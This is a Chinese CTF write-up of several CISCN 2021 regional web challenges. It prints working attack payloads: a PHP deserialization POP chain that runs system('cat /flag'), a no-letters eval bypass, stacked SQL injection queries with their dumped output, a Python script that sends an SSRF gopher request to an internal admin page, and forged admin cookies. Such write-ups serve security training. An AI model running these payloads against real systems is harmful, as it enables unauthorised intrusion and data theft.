CISCN 华南区域赛

太菜了 我躺平了

easy_seri

<?php

error_reporting(0);

highlight_file(__FILE__);

class Test{

    public $public_key;

    public $private_key;

    function __wakeup(){

        if($public_key !== $private_key)

        {

            die("You can't");

        }

    }

    function getHint()

    {

        echo file_get_contents('./demo.php');

    }

}

$a = $_GET['a'];

if(strpos($a,'key') !== false){

    die("No!!!");

}

else

{

    unserialize($a)();

}

?>

反序列化,16进制绕strpos,然后绕wakeup,数组执行getHint(因为unserialize后面还有个括号)

$test = new Test();

$test->public_key = 1;

$test->private_key = 2;

$a = [$test, 'getHint'];

echo serialize($a);

http://172.35.22.28/?a=a:2:{i:0;O:4:%22Test%22:2:{S:10:%22public_\6bey%22;s:1:%221%22;S:11:%22private_\6bey%22;s:1:%222%22;}i:1;s:7:%22getHint%22;}

看其他师傅的wp用静态方法调用也可以

a=s:13:"Test::getHint";

然后得到demo.php

<?php

class Fake{

	public $firm;

	public $test;

	public function __set($firm,$test){

	$test = "No,You can't";

	$firm = unserialize($firm);

	call_user_func($firm,$test);

  }

}

class Temp{

	public $pri;

	public $fin=1;

	public function __destruct()

	{

		$a=$this->action;

       $this->pri->$a = $this->fin;

	}

}

class OwO{

    public $fc;

    public $args;

	function run()

	{

		return ($this->fc)($this->args);

	}

}

$d = $_GET['poc'];

unserialize($d);

?>

找pop链

$a = new OwO();

$a -> fc = 'system';

$a -> args = 'cat /flag';

$xx = [$a, 'run'];

$b = serialize($xx);

$c = new Fake();

$d = new Temp();

$d -> pri = $c;

$d -> action = $b;

echo serialize($d);

http://172.35.22.28/demo.php?poc=O:4:%22Temp%22:3:{s:3:%22pri%22;O:4:%22Fake%22:2:{s:4:%22firm%22;N;s:4:%22test%22;N;}s:3:%22fin%22;i:1;s:6:%22action%22;s:87:%22a:2:{i:0;O:3:%22OwO%22:2:{s:2:%22fc%22;s:6:%22system%22;s:4:%22args%22;s:9:%22cat%20/flag%22;}i:1;s:3:%22run%22;}%22;}

magicchar

 <?php

error_reporting(0);

include'flag.php';

function Magic($str){

  for($i=0; $i<=strlen($str)-1; $i++) {

    if ((ord($str[$i])<32) or (ord($str[$i])>126)) {

      die('sorry');

      exit;

    }

  }

  $blklst = ['[A-VX-Za-z]',' ','\t','\r','\n','\'','""','`','\[','\]','\$','\\','\^','~'];

  foreach ($blklst as $blkitem) {

    if (preg_match('/' . $blkitem . '/m', $str)) {

      die('out');

      exit;

    }

  }

}

if(!isset($_GET['yell'])) {

  show_source(__FILE__);

} else {

  $str = $_GET['yell'];

  Magic($str);

  ob_start();

  $res = eval("echo " . $str . ";");

  $out = ob_get_contents();

  ob_end_clean();

  if ($out === "Wa4nn") {

      echo $flag;

  } else {

    echo htmlspecialchars($out, ENT_QUOTES);

  }

}

?>

还是那种无数字字母题的套路,用没ban的字符去拼an

str = r"W!@#%&*()_+<>?,.;:-{}/0123456789"

for i in range(0, len(str)):

    for j in range(0, len(str)):

        a = ord(str[i]) & ord(str[j])

        if chr(a) == 'n':

            print(str[i] + ' & ' + str[j] + ' is ' + chr(a))

        b = ord(str[i]) | ord(str[j])

        if chr(b) == 'n':

            print(str[i] + ' | ' + str[j] + ' is ' + chr(b))


@ | . is n

. | @ is n

! | @ is a

@ | ! is a

所以拼出来是$str = 'W.("!"|"@").(4).("@"|".").("@"|".")';

really_admin

虎符杯原题 《慢慢做》的基础上还ban了rename,等一手wp

一些结构

#登录

129581926211651571912466741651878684928

#数据库

1';show databases;#

array(3) {

[0]=>

array(1) {

["Database"]=>

string(3) "ctf"

}

[1]=>

array(1) {

["Database"]=>

string(4) "ctf2"

}

[2]=>

array(1) {

["Database"]=>

string(18) "information_schema"

}

}

#表

username=';show tables;#&password=1

array(2) {

  [0]=>

  array(1) {

    ["Tables_in_ctf2"]=>

    string(10) "fake_admin"

  }

  [1]=>

  array(1) {

    ["Tables_in_ctf2"]=>

    string(27) "real_admin_here_do_you_find"

  }

}

#fake_admin表

username=1';desc `fake_admin`;#&password=1

array(1) {

  [0]=>

  array(3) {

    ["id"]=>

    string(1) "1"

    ["username"]=>

    string(10) "fake_admin"

    ["fake_password"]=>

    string(13) "fake_password"

  }

}

#fake_admin表详细结构

username=1';desc fake_admin;#&password=1

array(3) {

[0]=>

array(6) {

["Field"]=>

string(2) "id"

["Type"]=>

string(7) "int(11)"

["Null"]=>

string(3) "YES"

["Key"]=>

string(0) ""

["Default"]=>

NULL

["Extra"]=>

string(0) ""

}

[1]=>

array(6) {

["Field"]=>

string(8) "username"

["Type"]=>

string(4) "text"

["Null"]=>

string(3) "YES"

["Key"]=>

string(0) ""

["Default"]=>

NULL

["Extra"]=>

string(0) ""

}

[2]=>

array(6) {

["Field"]=>

string(13) "fake_password"

["Type"]=>

string(4) "text"

["Null"]=>

string(3) "YES"

["Key"]=>

string(0) ""

["Default"]=>

NULL

["Extra"]=>

string(0) ""

}

}

#real_admin_here_do_you_find表

username=1';show create table real_admin_here_do_you_find;#&password=1

用的脚本

import requests

from urllib.parse import quote

cmd="username=1';use ctf2;create procedure `real_admin_here_do_you_find`(out string username(1024), out string password(1024));#&password=1"

url="http://172.35.22.30/"

sess=requests.session()

r1=sess.get(url+'?password=129581926211651571912466741651878684928')

data='''POST /admin.php HTTP/1.1

Host: 172.35.22.30

Content-Type:application/x-www-form-urlencoded

Content-Length: '''+str(len(cmd))+'''

'''+cmd+'''

'''

data=quote(data)

data=data.replace('%0a','%0d%0a')

print(url+"/ssrf.php?way=gopher://127.0.0.1:80/_"+quote(data))

r2=sess.get(url+"/ssrf.php?way=gopher://127.0.0.1:80/_"+quote(data))

print(r2.text)

后面看wp库没改,直接拿原题账户名密码登录拿cookie,我只能说我吐了

login

source里面找到重置密码里的reset. js,美化一下

var _0x2080 = [';\x20path=', '20020', 'click', '613aUgSFW', '3SAEYel', 'getTime', 'status', '(^|&)', 'resetCode', 'reset\x20error!', 'search', 'username', '/reset.php', 'toGMTString', '4643XbPscq', '110490vewBbv', 'substr', 'trim', ';\x20secure', '=([^&]*)(&|$)', '/reset.html', '125003cVvFwO', 'i3uperAdmin', '29McXNot', '11UWIoUd', '606tyixnX', ';\x20expires=', 'isSuperadmin', 'setTime', 'password', 'POST', '.forget-form\x20button[type=submit]', '783835ibZbfF', '790ahpXiE', 'location', '20010', 'url', '#password', 'ajax', 'preventDefault', '#resetCode', '326914FPIfpA', '111guOwYa', 'val'];

(function (_0x4f02d3, _0x548f46) {

    var _0x59634c = _0x4c63;

    while (!![]) {

        try {

            var _0x5ee11a = parseInt(_0x59634c(0x16f)) + parseInt(_0x59634c(0x168)) * parseInt(_0x59634c(0x166)) + parseInt(_0x59634c(0x178)) + parseInt(_0x59634c(0x17e)) * parseInt(_0x59634c(0x170)) + -parseInt(_0x59634c(0x179)) * -parseInt(_0x59634c(0x15d)) + parseInt(_0x59634c(0x15e)) * -parseInt(_0x59634c(0x17f)) + parseInt(_0x59634c(0x164)) * -parseInt(_0x59634c(0x167));

            if (_0x5ee11a === _0x548f46) break;

            else _0x4f02d3['push'](_0x4f02d3['shift']());

        } catch (_0x10deb7) {

            _0x4f02d3['push'](_0x4f02d3['shift']());

        }

    }

}(_0x2080, 0x66e57));

function _0x4c63(_0x43ef06, _0x1cd342) {

    _0x43ef06 = _0x43ef06 - 0x15c;

    var _0x20803a = _0x2080[_0x43ef06];

    return _0x20803a;

}

function initReset() {

    var _0x1ec24d = _0x4c63;

    $(_0x1ec24d(0x16e))[_0x1ec24d(0x17d)](function (_0x14125e) {

        var _0x40984e = _0x1ec24d;

        let _0x4e6bb8 = {};

        _0x4e6bb8[_0x40984e(0x186)] = $[_0x40984e(0x160)]($('#account')[_0x40984e(0x17a)]()), _0x4e6bb8[_0x40984e(0x16c)] = $[_0x40984e(0x160)]($(_0x40984e(0x174))[_0x40984e(0x17a)]()), _0x4e6bb8[_0x40984e(0x183)] = $[_0x40984e(0x160)]($(_0x40984e(0x177))['val']()), _0x14125e[_0x40984e(0x176)](), $[_0x40984e(0x175)]({

            'url': _0x40984e(0x187),

            'type': _0x40984e(0x16d),

            'data': _0x4e6bb8,

            'success': function (_0x5e89aa) {

                var _0x1ea9ce = _0x40984e;

                if (_0x5e89aa[_0x1ea9ce(0x181)] == !![] && _0x5e89aa['code'] == _0x1ea9ce(0x17c)) setCookie('user', _0x5e89aa['user']);

                else _0x5e89aa[_0x1ea9ce(0x181)] == !![] && _0x5e89aa['code'] == _0x1ea9ce(0x172) ? (setCookie(_0x1ea9ce(0x16a), _0x1ea9ce(0x165)), confirm('you\x20are\x20super,\x20change\x20it\x20again!') && (window['location'] = _0x1ea9ce(0x163))) : alert(_0x1ea9ce(0x184));

                window[_0x1ea9ce(0x171)] = _0x5e89aa[_0x1ea9ce(0x173)];

            }

        });

    });

}

var getUrlParam = function (_0x2cb7b6) {

        var _0x245579 = _0x4c63,

            _0xeb22a7 = new RegExp(_0x245579(0x182) + _0x2cb7b6 + _0x245579(0x162)),

            _0x337c56 = window[_0x245579(0x171)][_0x245579(0x185)][_0x245579(0x15f)](0x1)['match'](_0xeb22a7);

        if (_0x337c56 != null) return _0x337c56[0x2];

        return null;

    },

    setCookie = function (_0x29c615, _0x2f3e2e, _0x1c78b1, _0x5aad83, _0x5a33c1, _0x4ab9cc) {

        var _0x37a648 = _0x4c63,

            _0x3b17bb, _0x5ee6f4 = escape(_0x29c615) + '=' + escape(_0x2f3e2e);

        _0x3b17bb = new Date(), _0x3b17bb[_0x37a648(0x16b)](_0x3b17bb[_0x37a648(0x180)]() + _0x1c78b1), _0x5ee6f4 += _0x5aad83 ? ';\x20domain=' + _0x5aad83 : '', _0x5ee6f4 += _0x5a33c1 ? _0x37a648(0x17b) + _0x5a33c1 : '', _0x5ee6f4 += _0x1c78b1 ? _0x37a648(0x169) + _0x3b17bb[_0x37a648(0x15c)]() : '', _0x5ee6f4 += _0x4ab9cc ? _0x37a648(0x161) : '', document['cookie'] = _0x5ee6f4;

    };

做了js混淆,变量名比较恶心

重点看initReset()这个函数,登录success那里有user和管理员的setCookie

跟着函数走一遍,把initReset()放上去,然后把serCookie的参数放上去

(setCookie(_0x1ea9ce(0x16a), _0x1ea9ce(0x165))

得到一对cookie的值,带着这个值去改密码就行了。

isSuperadmin

i3uperAdmin

然后到reset.php

最后用修改后的账号密码登录即可

easy_Forensics

有个网络连接pid1716

看pstree ppid1716的几个

rundll32很可疑

找到了后面的一半flag

前面一半找了很久,文件内存信息都dump出来看了也没发现

然后就试了下正则嗯翻,翻到了

也就第80个,运气好

2021CISCN 华南赛区WEB wp的更多相关文章

  1. ISCC的 Web——WP

    比赛已经结束了,自己做出来的题也不是很多,跟大家分享一下 第一题:比较数字大小 打开连接 在里面随意输入一个值,他会提示数字太小了 那么我们输入他允许的最大值试试 他还是提示太小了 我们知道做web‘ ...

  2. 实验吧—Web——WP之 Forms

    我们先打开解题链接: 做Web题的第一步就是查看网页源代码,当然,有些网页他不会让你点击右键,那么可以在地址栏里的地址前面加上:view-source: 当然也可以打开控制台F12 我们可以看到代码里 ...

  3. 到处抄来的SUCTF2019 web wp

    0x01 EasySQL 这是一个考察堆叠注入的题目,但是这道题因为作者的过滤不够完全所以存在非预期解 非预期解 直接构造 *,1 这样构造,最后拼接的查询语句就变成了 select *,1||fla ...

  4. 2019西湖论剑web wp

    发在正文前 这应该是自己在安全圈摸爬滚打两年多以来第一次正规的ctf比赛.没解出flag,没截图,只提供了一些思路. 遥想往昔,初入大学,带着对PT的向往,一个人穿行在幽暗的图书馆,翻阅啃读一本本安全 ...

  5. 实验吧—Web——WP之 FALSE

    打开链接,点击源码按钮,我们开始分析源码: 在这源码中我们能看出 如果名字等于密码就输出:你的名字不能等于密码 如果名字的哈希值等于密码的哈希值,那么就会输出flag 这就意味着我们要上传两个值,值不 ...

  6. 实验吧—Web——WP之 Guess Next Session

    打开链接,他有给出查看原码的按钮,那么我们打开看看 在这个里面,如果GET的值等于session的就会给出flag 那么我们进行抓包改包 在输入框内随意输入一个值然后抓包 将password的值删去, ...

  7. 实验吧—Web——WP之 简单的sql注入之2

    直接打开解题连接: 既然是SQL注入,那么我们就要构造注入语句了,这个就要有耐心一个一个去尝试了 输入语句 1'and 1=1 # 和 1'and/**/1=1/**/#后 对比一下,发现是过滤掉了空 ...

  8. 实验吧—Web——WP之 上传绕过

    我们先上传一个png文件,发现他说必须上传后缀名为PHP的文件才可以,那么,我们尝试一下,PHP文件 但是他又说不被允许的文件类型 在上传绕过里最有名的的就是00截断,那么我们就先要抓包 在这里我们需 ...

  9. 实验吧—Web——WP之 猫抓老鼠

    打开解题链接后,发现他是让我们输入key提交查询就能进行下一步 题目中提示了:catch(抓的意思) 那么我们很容易就能想到是BP抓包,抓包后直接放到repeater中改包. 我们先GO一下看看有什么 ...

随机推荐

  1. 关于selenium中的三种等待方式与EC模块的知识

    1. 强制等待 第一种也是最简单粗暴的一种办法就是强制等待sleep(xx),强制让闪电侠等xx时间,不管凹凸曼能不能跟上速度,还是已经提前到了,都必须等xx时间. 看代码: 1 2 3 4 5 6 ...

  2. NOI.AC#2139-选择【斜率优化dp,树状数组】

    正题 题目链接:http://noi.ac/problem/2139 题目大意 给出\(n\)个数字的序列\(a_i\).然后选出一个不降子序列最大化子序列的\(a_i\)和减去没有任何一个数被选中的 ...

  3. 如何使用云效Flow做质量检测,保障高质量的交付速度

    使用云效Flow做质量检测,保障高质量的交付速度,云效「Flow」 提供代码扫描. 安全扫描和各种自动化测试能力,支持人工测试卡点.自动化验证卡点等多种质量红线,确保业务质量.云效流水线 Flow 流 ...

  4. 【C++ Primer Plus】编程练习答案——第10章

    1 // chapter10_1_account.h 2 3 #ifndef LEARN_CPP_CHAPTER10_1_ACCOUNT_H 4 #define LEARN_CPP_CHAPTER10 ...

  5. 踩坑系列《八》解决Win10没有找到Hyper-v的错误

    最近要安装docker,所以得开启Hyper属性面板,找了下,发现电脑上没有看到该属性. 在这之前,得先判断,你电脑是不是支持Hyper,打开cmd窗口,输入systeminfo 看看最下面Hyper ...

  6. requirejs的加载原理 - 场景1. 定义一个require依赖a模块

    我们学习一个新的技术,熟练的使用之后,就应该去探索它的原理.这篇文章我们来探索下requirejs的原理. 从4个场景来探索requirejs的原理 场景1. 定义一个require依赖b模块 场景2 ...

  7. Initialize this repository with a README

    在gitHub创建项目时,有很多小伙伴不太清楚 Initialize this repository with a README 在什么情况下需要勾选,在这里简单说明 如下: 1. 翻译 如果要导入现 ...

  8. Java爬虫系列四:使用selenium-java爬取js异步请求的数据

    在之前的系列文章中介绍了如何使用httpclient抓取页面html以及如何用jsoup分析html源文件内容得到我们想要的数据,但是有时候通过这两种方式不能正常抓取到我们想要的数据,比如看如下例子. ...

  9. Visual Studio Debug only user code with Just My Code

    Debug only user code with Just My Code By default, the debugger skips over non-user code (if you wan ...

  10. TCC分布式事务的实现原理

    目录 一.写在前面 二.业务场景介绍 三.进一步思考 四.落地实现TCC分布式事务 (1)TCC实现阶段一:Try (2)TCC实现阶段二:Confirm (3)TCC实现阶段三:Cancel 五.总 ...